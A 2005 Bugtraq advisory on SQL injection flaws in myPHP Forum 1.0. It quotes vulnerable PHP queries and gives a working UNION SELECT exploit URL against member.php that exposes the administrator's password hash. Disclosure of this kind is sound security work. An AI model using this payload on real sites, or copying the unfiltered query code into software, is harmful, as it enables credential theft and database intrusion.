Several SQL injection bugs in myPHP Forum v.1.0

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Several SQL injection bugs in myPHP Forum v.1.0
From: foster GHC <foster@xxxxxx>
Date: 9 Feb 2005 08:17:14 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


/*==========================================*/
// GHC -> MyPHP Forum <- ADVISORY
// Product: MyPHP Forum
// Version: 1.0
// URL: http://www.myphp.ws
// VULNERABILITY CLASS: SQL injection
/*==========================================*/

[Product Description]
MyPHP Forum is a simple message board script with limited features.

[Summary]
Several SQL Injection vulnerabilities may lead to viewing of sensetive 
information,
including hash of user's password.

[Details]
Positive part of user outbound variables used as they are in SQL queries.

[1] script name: forum.php

---[code]---
$query = mysql_query("SELECT fid, name FROM $db_forum WHERE fid='$fid'") or 
die(mysql_error());
$nav = mysql_fetch_array($query);
---[/code]---

Possible SQL injection through $fid variable that has no filtration.

[2] script name: member.php

---[code]---
if($action == "viewpro") {
        $member = $HTTP_GET_VARS['member'];
        $sql =  "SELECT * FROM $db_member WHERE username='$member'";
        $query = mysql_query("SELECT * FROM $db_member WHERE 
username='$member'") or die("cant execute $sql");
        $member = mysql_fetch_array($query);
---[/code]---

SQL code injection 
member.php?action=viewpro&member=[SQL code]

[example of exploit]
member.php?action=viewpro&member=nonexist' UNION SELECT uid, username, 
password, status, email, website, aim, msn, location, sig, regdate, posts, 
password as yahoo FROM nb_member WHERE uid='1
will show administrator's name and password hash (in the "Yahoo" field).  

Password cripted by encrypt() function:
-[code]-
function encrypt($string) {
    $crypted = crypt(md5($string), md5($string));
    return $crypted;
}
-[/code]-

[3] script name: forgot.php

---[code]---
$email = $_REQUEST['email'];
        if (isset($email)) {
        $sql="SELECT * FROM $db_member WHERE email='$email'";  
...
$result = mysql_query("SELECT username FROM $db_member WHERE email='$email'");
                        $username = mysql_result($result, 0);
                        $msg = "
                        Hello $username,
---[code]---
$email variable has no filtration. 
IMPACT: Possible SQL injection through this variable.

[4] script name: include.php
This is the most important script that is the part of all others.
$nbuser & $nbpass variables are not filtering. 

---[code]---
$query = mysql_query("SELECT * FROM $db_member WHERE username='$nbuser'")
---[/code]---
IMPACT: possible SQL injection through $nbuser.

P.S. all bugs are actual for magic_quotes_gpc=0.

/* ================================================== */
/* www.ghc.ru -- security games & challenges          */
/* ================================================== */
/* greets to: RST.void.ru, D0G4 & all quest hunters %)*/
/* ================================================== */

Prev by Date: MDKSA-2005:031 - Updated perl packages fix multiple vulnerabilities
Next by Date: [ GLSA 200502-09 ] Python: Arbitrary code execution through SimpleXMLRPCServer
Previous by thread: MDKSA-2005:031 - Updated perl packages fix multiple vulnerabilities
Next by thread: [ GLSA 200502-09 ] Python: Arbitrary code execution through SimpleXMLRPCServer
Index(es):
- Date
- Thread